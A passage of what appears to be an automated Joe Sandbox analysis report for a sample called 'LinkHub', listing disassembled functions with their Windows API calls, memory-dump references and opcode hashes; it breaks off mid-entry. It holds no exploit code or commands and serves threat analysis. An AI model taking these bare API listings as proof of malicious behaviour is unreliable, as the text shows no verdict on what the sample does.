                                                                    Function 00CD7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CD7B6D
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CD7BA3
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CD7BB4
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7C36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: a50e644df4af783edd617f3d1b026b2b0e792cf488810be8383a88c04002ac0d
                                                                    • Instruction ID: 11002e176ed7ec18cb411b6bfea631bd7d30af8e4a7a7bd8c808e4076862a99c
                                                                    • Opcode Fuzzy Hash: a50e644df4af783edd617f3d1b026b2b0e792cf488810be8383a88c04002ac0d
                                                                    • Instruction Fuzzy Hash: BD4171B1604304EFDB15DF64D885A9A7BB9EF84314F1481AEAA05DF305EBB1DA44CBA0
                                                                    Function 00D04818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D048D1
                                                                    • IsMenu.USER32(?), ref: 00D048E6
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D0492E
                                                                    • DrawMenuBar.USER32 ref: 00D04941
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                    • String ID: 0
                                                                    • API String ID: 3076010158-4108050209
                                                                    • Opcode ID: bf14aeb601d5ae06d3f69bb97f7326cad159ad6b93c40612edcde43d93c531b4
                                                                    • Instruction ID: 36698fd73afdc2c2bba9a4df5df3208e47c4f0d24345954276bb04a489f5dea0
                                                                    • Opcode Fuzzy Hash: bf14aeb601d5ae06d3f69bb97f7326cad159ad6b93c40612edcde43d93c531b4
                                                                    • Instruction Fuzzy Hash: 274119B5A01209AFDB10CF51E884EAA7BB9FF46324F088129EA5997390D730ED54CF60
                                                                    Function 00CD272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CD27B3
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CD27C6
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CD27F6
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2081771294-1403004172
                                                                    • Opcode ID: 7e0c7c9d86604ae9e1f7184a24bc5efac80acb6e31c4e4f9a47a9fe5c8f130b5
                                                                    • Instruction ID: 3b32c6162147562c20e06893f8fcc0dbd9b845ab6e2a8294097b9386b5816471
                                                                    • Opcode Fuzzy Hash: 7e0c7c9d86604ae9e1f7184a24bc5efac80acb6e31c4e4f9a47a9fe5c8f130b5
                                                                    • Instruction Fuzzy Hash: 45210772940104BFDB15ABA0DC49DFFBBB9DF55360F10812BF526972E1DB344D09A660
                                                                    Function 00D039B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D03A29
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00D03A30
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D03A45
                                                                    • DestroyWindow.USER32(?), ref: 00D03A4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 3529120543-1011021900
                                                                    • Opcode ID: 89b44ffdc64a959fb61b99b080c29dd562d061431b49f65d1d475e965a198cd7
                                                                    • Instruction ID: e42d2ab8c29f6102cdd82b704ed2e470c57e60a09990b552d6b7add28df16d1e
                                                                    • Opcode Fuzzy Hash: 89b44ffdc64a959fb61b99b080c29dd562d061431b49f65d1d475e965a198cd7
                                                                    • Instruction Fuzzy Hash: 2D215871600309ABEF109FA4EC80FAB77ADEB49368F145219FA99D61E0C771CD519B70
                                                                    Function 00C950DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C9508E,00000003,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002), ref: 00C950FD
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C95110
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00C9508E,00000003,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002,00000000), ref: 00C95133
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 4fe4a39f8d5f138f90dbabe27f49631173ea0184655071f93ff5aee644b77d26
                                                                    • Instruction ID: 97090127cee0735b44662470e6d2461417e1935d043b507e2d5abd8339984319
                                                                    • Opcode Fuzzy Hash: 4fe4a39f8d5f138f90dbabe27f49631173ea0184655071f93ff5aee644b77d26
                                                                    • Instruction Fuzzy Hash: 49F04F35A00308BFDB119F94EC49BADBFB5EF08752F040065F909E22A0DF749A94DBA1
                                                                    Function 00CCE778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32 ref: 00CCE785
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CCE797
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00CCE7BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                    • API String ID: 145871493-2590602151
                                                                    • Opcode ID: f4894f9ea93f5062769c11e7d72002eaca2c4dc5bf3714de9f255c158e13599a
                                                                    • Instruction ID: 7167191084395dfbe308dbae3b989f02666a4a24ae0ff483d52202bb64882ae2
                                                                    • Opcode Fuzzy Hash: f4894f9ea93f5062769c11e7d72002eaca2c4dc5bf3714de9f255c158e13599a
                                                                    • Instruction Fuzzy Hash: 8DF0E5719117219FD7326F608C48F6976296F12701F15059DF84AE2250DF70CE8487A5
                                                                    Function 00C7663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7664A
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C7665C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7666E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-3689287502
                                                                    • Opcode ID: 772ff6353d572a6f86575c79eb1f35d40b118e61471cd12a0acde9074414a4aa
                                                                    • Instruction ID: 7d7264df59fa67e088798e45e2364ce500cbf4dd6032082045770482b9d93033
                                                                    • Opcode Fuzzy Hash: 772ff6353d572a6f86575c79eb1f35d40b118e61471cd12a0acde9074414a4aa
                                                                    • Instruction Fuzzy Hash: 62E08636601B225BD2111B69AC08B5AB5299F82B16B454116F80CD2240DFB4CD0580F5
                                                                    Function 00C76607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76610
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C76622
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76635
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-1355242751
                                                                    • Opcode ID: c846bf090408ede9466ad472c84acf782e546e18de78a433c36238b4ae9cd82d
                                                                    • Instruction ID: e2ff7a8684dc8a980dd1b45620fe52d1f236289ba2fb30f56a4ae443fbbfa1db
                                                                    • Opcode Fuzzy Hash: c846bf090408ede9466ad472c84acf782e546e18de78a433c36238b4ae9cd82d
                                                                    • Instruction Fuzzy Hash: 5FD01236612B315B92222F666C18BCE7A169F96B213454016B81CE3254CF74CE0585F9
                                                                    Function 00CE3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE35C4
                                                                    • DeleteFileW.KERNEL32(?), ref: 00CE3646
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CE365C
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE366D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE367F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$Copy
                                                                    • String ID:
                                                                    • API String ID: 3226157194-0
                                                                    • Opcode ID: 6c69e47259acb6e79fccd3157ed7e4ef1d4a77c2b851699291c72f8df04fdd14
                                                                    • Instruction ID: 5107a4d06533de8d820fc8290c57336b8473aab7be52b5e902cc272c893e6186
                                                                    • Opcode Fuzzy Hash: 6c69e47259acb6e79fccd3157ed7e4ef1d4a77c2b851699291c72f8df04fdd14
                                                                    • Instruction Fuzzy Hash: 1AB16D72901259ABDF11DFA5CC89EDEBBBDEF48314F0040A6F509E7251EB30AB449B61
                                                                    Function 00CFADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00CFAE87
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CFAE95
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CFAEC8
                                                                    • CloseHandle.KERNEL32(?), ref: 00CFB09D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 3488606520-0
                                                                    • Opcode ID: 487977a3d48e0f8f43e8357b3f93df7ef50e0baefa88dda5b2db643f82d97767
                                                                    • Instruction ID: 0125314e16e8f5e2f0bb5be4cd6ada9ab594bba704cffce87ec64877eb464965
                                                                    • Opcode Fuzzy Hash: 487977a3d48e0f8f43e8357b3f93df7ef50e0baefa88dda5b2db643f82d97767
                                                                    • Instruction Fuzzy Hash: 02A1C3B1A043019FE760DF24C886F2AB7E5AF44714F14885DF5699B392CB71ED41CB92
                                                                    Function 00CFC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC505
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CFC560
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CFC5C3
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00CFC606
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFC613
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 826366716-0
                                                                    • Opcode ID: 7766ffd2ede4bc9061e5f6d3855bc2118381dd6abe023a01c52ad2013a9de019
                                                                    • Instruction ID: 65d3a68a79d40fbe101631db00c6e5687232c80f322adcf48b04717d4db3e010
                                                                    • Opcode Fuzzy Hash: 7766ffd2ede4bc9061e5f6d3855bc2118381dd6abe023a01c52ad2013a9de019
                                                                    • Instruction Fuzzy Hash: 5B619D71208249AFC354DF24C990E3ABBE5FF84308F54855CF1998B2A2CB31ED45DB92
                                                                    Function 00CDED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CDD7CD,?), ref: 00CDE714
                                                                      • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CDD7CD,?), ref: 00CDE72D
                                                                      • Part of subcall function 00CDEAB0: GetFileAttributesW.KERNEL32(?,00CDD840), ref: 00CDEAB1
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00CDED8A
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00CDEDC3
                                                                    • _wcslen.LIBCMT ref: 00CDEF02
                                                                    • _wcslen.LIBCMT ref: 00CDEF1A
                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00CDEF67
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3183298772-0
                                                                    • Opcode ID: 440f82f4dbcebc4416c18a20b266983bf0001b318d8cef0ce22e9eafaff9e4bf
                                                                    • Instruction ID: 104d3a8a966cfa9e77bf39235328d8cc8c27c65732e28980e08418297dc34372
                                                                    • Opcode Fuzzy Hash: 440f82f4dbcebc4416c18a20b266983bf0001b318d8cef0ce22e9eafaff9e4bf
                                                                    • Instruction Fuzzy Hash: 375165B24083459BC724EB94DC859DBB3ECEF94310F40492FF299D7251EF31A6889766
                                                                    Function 00CD9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00CD9534
                                                                    • VariantClear.OLEAUT32 ref: 00CD95A5
                                                                    • VariantClear.OLEAUT32 ref: 00CD9604
                                                                    • VariantClear.OLEAUT32(?), ref: 00CD9677
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CD96A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                    • String ID:
                                                                    • API String ID: 4136290138-0
                                                                    • Opcode ID: 7cab289a0596ef6bbabb408fad26a93f7d948af395722e1c44e040e6f3554157
                                                                    • Instruction ID: f6ddb5cd5fca7df4c4c60afab13bd028d40d4592134e0fb4334ad3b8ee8750ec
                                                                    • Opcode Fuzzy Hash: 7cab289a0596ef6bbabb408fad26a93f7d948af395722e1c44e040e6f3554157
                                                                    • Instruction Fuzzy Hash: 10514AB5A00219EFCB14DF58C884AAAB7F9FF89314B15855AF919DB310E730E911CB90
                                                                    Function 00CE9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CE95F3
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00CE961F
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CE9677
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CE969C
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CE96A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                    • String ID:
                                                                    • API String ID: 2832842796-0
                                                                    • Opcode ID: 3cc97690700b15eb376a9f39508fa76e3b868a8fd444d47d273fa2905c08c0cd
                                                                    • Instruction ID: 3bb6bde81e63c96c914a4f90830a48499164a5606c9ff4e15329efab4468c89e
                                                                    • Opcode Fuzzy Hash: 3cc97690700b15eb376a9f39508fa76e3b868a8fd444d47d273fa2905c08c0cd
                                                                    • Instruction Fuzzy Hash: 3D513A35A002159FCB05DF65C885A6EBBF5FF48314F04C059E949AB362CB35ED41DB90
                                                                    Function 00CF9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
